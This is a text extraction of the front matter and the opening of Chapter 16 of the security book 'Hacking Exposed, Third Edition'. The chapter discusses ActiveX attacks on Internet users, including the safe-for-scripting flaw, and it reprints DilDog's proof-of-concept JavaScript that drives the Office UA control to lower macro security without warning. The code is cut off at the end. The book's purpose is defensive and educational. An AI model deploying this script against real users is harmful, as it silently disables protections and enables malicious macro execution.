Color profile:ProLib8 Generic/ Hacking CMYK Exposed: printer profile Network Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Front Composite Default screen Matter
HACKING EXPOSED: NETWORK SECURITY SECRETS AND SOLUTIONS, THIRD EDITION
STUART McCLURE JOEL SCAMBRAY GEORGE KURTZ
Osborne/McGraw-Hill New York Chicago San Francisco Lisbon London Madrid Mexico City Milan New Delhi San Juan Seoul Singapore Sydney Toronto
P:\010Comp\Hacking\381-6\fm.vp Monday, September 10, 2001 2:11:09 PM Color profile:ProLib8 Generic/ Hacking CMYK Exposed: printer profile Network Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Front Composite Default screen Matter
Osborne/McGraw-Hill 2600 Tenth Street Berkeley, California 94710 U.S.A.
To arrange bulk purchase discounts for sales promotions, premiums, or fund-raisers, please contact Osborne/McGraw-Hill at the above address. For information on transla- tions or book distributors outside the U.S.A., please see the International Contact Infor- mation page immediately following the index of this book.
Hacking Exposed: Network Security Secrets and Solutions, Third Edition
Copyright © 2001 by The McGraw-Hill Companies. All rights reserved. Printed in the United States of America. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed in any form or by any means, or stored in a database or retrieval system, without the prior written permission of the publisher, with the exception that the program listings may be entered, stored, and executed in a computer system, but they may not be reproduced for publication.
1234567890 CUS CUS 01987654321
Book p/n 0-07-219382-4 and CD p/n 0-07-219383-2 parts of ISBN 0-07-219381-6
Publisher Proofreaders Brandon A. Nordin Stefany Otis, Linda Medoff, Vice President & Associate Publisher Paul Medoff Scott Rogers Indexer Acquisitions Editor Karin Arrigoni Jane K. Brownlow Computer Designers Project Editor Carie Abrew, Elizabeth Jang, LeeAnn Pickrell Melinda Lytle Acquisitions Coordinator Illustrators Emma Acker Michael Mueller, Lyssa Wald Technical Editors Series Design Tom Lee, Eric Schultze Dick Schwartz, Peter F. Hancik Copy Editor Cover Design Janice A. Jue Dodie Shoemaker
This book was composed with Corel VENTURA™ Publisher.
Information has been obtained by Osborne/McGraw-Hill from sources believed to be reliable. However, because of the possibility of human or mechanical error by our sources, Osborne/McGraw-Hill, or others, Osborne/McGraw-Hill does not guarantee the accuracy, adequacy, or completeness of any information and is not responsible for any errors or omissions or the results obtained from use of such information.
P:\010Comp\Hacking\381-6\fm.vp Monday, September 10, 2001 2:11:09 PM ColorProLib8 profile:/ Hacking Generic Exposed: CMYK printer Network profile Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16 Composite Default screen
CHAPTER 16
Hacking the Internet User
635
P:\010Comp\Hacking\381-6\ch16.vp Monday, September 10, 2001 9:44:14 AM ColorProLib8 profile:/ Hacking Generic Exposed: CMYK printer Network profile Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16 Composite Default screen
636 Hacking Exposed: Network Security Secrets and Solutions
e’ve spent a lot of time in this book talking about common techniques for break- ing into systems that are owned by companies and run by experienced adminis- Wtrators. After all, that’s where all the valuables are, right? What could malicious hackers possibly hope to attain from breaking into the average home computer? The reality is, the home computer is only part of the picture. Everyone uses the prod- ucts preyed upon in this chapter: web browsers, email readers, and all manner of Internet client software. Everyone is thus a potential victim, and the information on their system is likely just as critical as the stuff sitting on a web server, if not more so. The sheer distrib- uted nature of the problem also makes it much harder to address than its counterpart on the server side. The tools and techniques highlighted in this chapter affect not just individuals, but can also have a devastating impact on the organizations they work for. If you consider that everyone from CEO to shipping clerk uses this software for nearly 90 percent of their daily activities (namely, email reading and web browsing), it might dawn on you that this is indeed a serious issue for corporate users, as well as for the average consumer Internet surfer. Also consider the potential public relations embarrassment and potential down- stream liability for a company that perpetuated the spread of malicious code like worms by not taking the appropriate security measures. Worried yet? Hacking the Internet user is snowballing in popularity among the underground if the hail of Internet client software security advisories released in 2001 is any indication. Client- side hacking requires only a slightly different mindset from that which seeks to compro- mise major Internet servers such as www.amazon.com. The difference is one of degree of effort and scale. Instead of focusing intense intellectual effort against one unique target or specific web server application, user hacking seeks to find a common denominator among the widest range of potential victims. Typically, this common denominator is a combination of frequent Internet usage, Microsoft’s overwhelmingly popular and widely used software products, and lack of security savvy among the biological organisms oper- ating that software. We’ve already covered some of the many ways that these omnipresent factors can be exploited. Chapter 4 discussed attacks against Microsoft’s consumer operating systems most used by Internet denizens (Win 9x/ME/XP HE). Chapters 4 and 14 covered Trojans and back doors often planted on unsuspecting user’s systems, as well as the technique of “social engineering” that is so effective in getting a computer’s human operator to per- form the malicious hacker’s bidding by nontechnical means. This chapter will build on some of this work. It will introduce entirely different and more insidious paths by which back doors can be planted, as well as a more technical route for launching some of the most subliminal social attacks (that is, the subject line of an email message). Before we begin, we must warn those of faint heart that what we are about to show you is incredibly volatile if used unwisely. Unquestionably, we will be criticized for ex- plaining in detail how all these attacks are actually implemented. To which we will an- swer, as we have throughout this book: only in understanding the ways of the enemy in intimate detail will we protect potential victims. Our own journey of discovery through the material presented here was quite a jarring eye-opener. Read on to learn how to pro- tect your personal slice of the Internet.
P:\010Comp\Hacking\381-6\ch16.vp Monday, September 10, 2001 9:44:14 AM ColorProLib8 profile:/ Hacking Generic Exposed: CMYK printer Network profile Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16 Composite Default screen
Chapter 16: Hacking the Internet User 637
MALICIOUS MOBILE CODE Mobile code was important in the genesis of the Internet from a static, document-based medium to the dynamic, spontaneously generated community that it is today. Some evo- lution of current mobile code technologies may yet prove to be the dominant model for computing of the future. However, current trends have moved away from reliance on such client-side execution models and toward dynamic HTML (DHTML), style sheets, and server-side scripting functionality. (Some may argue that the execution is still occur- ring on the client side, it’s just migrating deeper into the web browser.) In any case, mo- bile code, which traverses a network during its lifetime and executes at a destination machine, remains a critical part of the fabric of the Net today (see http://www.computer .org/internet/v2n6/w6gei.htm). The two dominant paradigms for mobile code, Sun’s Java and Microsoft’s ActiveX, will still be found executing in browsers everywhere and thus are critically important to any discussion of Internet client security.
See Chapter 6 for a discussion of Microsoft’s .NET Frameworks, a new mobile code paradigm around which the company is building its next-generation software products.
Inevitably, comparisons are drawn between ActiveX and Java. We won’t get into the debate here, but rather will talk neutrally about actual vulnerabilities discovered in each system. For a strong technical discussion of the pluses and minuses of the two mobile code models from a security perspective, see “A Comparison Between Java and ActiveX Security” by David Hopwood at http://www.users.zetnet.co.uk/hopwood/papers/ compsec97.html. Microsoft ActiveX Microsoft dubbed its first attempt at a mobile code model ActiveX. ActiveX is often de- scribed simply as Object Linking and Embedding (OLE) compound-document technology revamped for the Web. This is a vast oversimplification of the set of APIs, specifications, and ambitious development paradigms, such as COM, that actually undergird the technol- ogy, but it is the easiest way to grasp it. ActiveX applications, or controls, can be written to perform specific functions (such as displaying a movie or sound file). They can be embed- ded in a web page to provide this functionality, just like OLE supports embedding of Excel spreadsheets within Word documents. ActiveX controls typically have the file extension .ocx. (ActiveX controls written in Java are an exception.) They are embedded within web pages using the
P:\010Comp\Hacking\381-6\ch16.vp Monday, September 10, 2001 9:44:15 AM ColorProLib8 profile:/ Hacking Generic Exposed: CMYK printer Network profile Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16 Composite Default screen
638 Hacking Exposed: Network Security Secrets and Solutions
Acting solely within the model described so far, malicious programmers could write ActiveX controls to do just about anything they wanted to a user’s machine. What stands in the way? Microsoft’s Authenticode paradigm. Authenticode allows developers to “sign” their code using cryptographic mechanisms that can be authenticated by IE and a third party before they are executed. (Verisign Corporation is typically the third party.) How does Authenticode work in the real world? In 1996, a programmer named Fred McLain wrote an ActiveX control that shut down the user’s system cleanly (if it was run- ning Windows 95 with advanced power management). He obtained a genuine Verisign signature for this control, which he called Internet Exploder, and hosted it on his web site. After brief debate about the merits of this public display of Authenticode’s security model in action, Microsoft and Verisign revoked McLain’s software publisher certificate, claiming he had violated the pledge on which it was based. Exploder still runs, but now informs surfers that it has not been registered and gives them the option to cancel the download. We’ll leave it to the reader to decide whether the Authenticode system worked or not in this instance; but keep in mind that McLain could have done far worse things than shut down a computer, and he could have done them a lot more stealthily, too. Today, ActiveX continues to provide essential functionality for many web sites with little fanfare. There have been additional problems, however, the most serious of which we will discuss next.
MThe ActiveX “Safe for Scripting” Issue Popularity: 9 Simplicity: 5 Impact: 10 Risk Rating: 8
In summer 1999, Georgi Guninski and Richard M. Smith, et al., separately revealed two different examples of the safe-for-scripting vulnerability in IE’s handling of ActiveX. By setting this safe-for-scripting flag in their controls, developers could bypass the nor- mal Authenticode signature checking entirely. Two examples of such controls that shipped with IE 4 and earlier, Scriptlet.typelib and Eyedog.OCX, were so flagged, and thus gave no warning to the user when executed by IE. ActiveX controls that perform harmless functions probably wouldn’t be all that wor- risome; however, Scriptlet and Eyedog both have the ability to access the user’s file sys- tem. Scriptlet.typlib can create, edit, and overwrite files on the local disk. Eyedog has the ability to query the Registry and gather machine characteristics. Georgi Guninski released proof-of-concept code for the Scriptlet control that writes an executable text file with the extension .hta (HTML application) to the Startup folder of a re- mote machine. This file will be executed the next time that machine reboots, displaying a harmless message from Georgi, but nevertheless making a very solemn point: by simply vis- iting Georgi’s concept page at http://www.guninski.com/scrtlb.html, you enable him to ex- ecute arbitrary code on your system. Game over. His proof-of-concept code is shown next.
P:\010Comp\Hacking\381-6\ch16.vp Monday, September 10, 2001 9:44:15 AM ColorProLib8 profile:/ Hacking Generic Exposed: CMYK printer Network profile Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16 Composite Default screen Chapter 16: Hacking the Internet User 639 >
This exposure of software interfaces to programmatic access was termed “accidental Trojans” by Richard M. Smith. ActiveX controls like Eyedog and Scriptlet sit harmlessly on the hard disks of millions of users, preinstalled with popular software like IE, waiting for someone to access them remotely (see http://www.cnn.com/TECH/computing/ 9909/06/activex.idg/). The extent of this exposure is alarming. Registered ActiveX controls can be marked as “safe for scripting” either by implementing IObjectSafety within the control or by marking them as safe in the Registry by adding the key 7DD95801-9882-11CF-9FA9-00AA006C42C4 to the Implemented Categories for the control (see http://msdn.microsoft.com/workshop/ components/activex/safety.asp). Searching through a typical Windows system Registry yields dozens of such controls. Any controls that also have the ability to perform privileged actions (such as writing to disk or executing code) could also be used in a similar attack. There are a few ways to get an idea of how many of these applications your system ac- tively uses. To simply view active COM applications (including ActiveX controls) in- stalled on your system, go to the Start button, select Run, and type dcomcnfg. The result is shown in the following illustration:
P:\010Comp\Hacking\381-6\ch16.vp Monday, September 10, 2001 9:44:16 AM ColorProLib8 profile:/ Hacking Generic Exposed: CMYK printer Network profile Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16 Composite Default screen
640 Hacking Exposed: Network Security Secrets and Solutions
To see if any of these have been marked safe for scripting in the Registry, employ oleview from the NT Resource Kit. (A newer version is included with Microsoft’s Visual Studio development environment.) Oleview browses all of the registered COM/ActiveX objects on the system. It will also display the Class ID (CLSID) by which it is called in the Registry, and many other important parameters as well, including Implemented Catego- ries. Oleview is shown next:
Oleview will also display the interfaces exported by an object, indicating whether the object is also a good target for hijacking to perform privileged actions. Sure enough, another such control was discovered nearly a year later by DilDog of Cult of the Dead Cow (of Back Orifice fame—see Chapter 4). The so-called Office 2000 UA (OUA) control is registered with a system when Microsoft’s Office suite of productivity tools is installed. DilDog’s proof-of-concept web page, http://www.atstake.com/research/ advisories/2000/ouahack/index.html, instantiates OUA remotely on the user’s system and then uses it to disable macro protection for Office documents without warning the user. DilDog’s page then downloads a file called “evil.doc,” which contains a simple macro that creates the file C:\dildog-was-here.txt. The remote instantiation of OUA is done using the following code embedded in DilDog’s proof-of-concept web page:
var ua;
function setup() { // Create UA control ua = new ActiveXObject("OUACtrl.OUACtrl.1");
// Attach ua object to ppt object ua.WndClass="OpusApp"; ua.OfficeApp=0;
P:\010Comp\Hacking\381-6\ch16.vp Monday, September 10, 2001 9:44:16 AM ColorProLib8 profile:/ Hacking Generic Exposed: CMYK printer Network profile Security Secrets and Solutions, Third Edition / McClure, Scambray & Kurtz / 9381-6 / Chapter 16 Composite Default screen
Chapter 16: Hacking the Internet User 641
// Verify UA objects sees Office application return ua.IsAppRunning(); }
function disablemacroprotection() { var ret;
// Activate application ua.AppActivate();
// Display macro security dialog ua.ShowDialog(0x0E2B);
// Click the 'low' button ua.SelectTabSDM(0x13);
// Click the 'ok' button ua.SelectTabSDM(1); }
function enablemacroprotection() { // Activate application ua.AppActivate();
// Display macro security dialog ua.ShowDialog(0x0E2B);
// Click the 'medium' button ua.SelectTabSDM(0x12);
// Click the 'ok' button ua.SelectTabSDM(1); } // Beginning of script execution if(setup()) { disablemacroprotection(); parent.frames["blank"].location=" }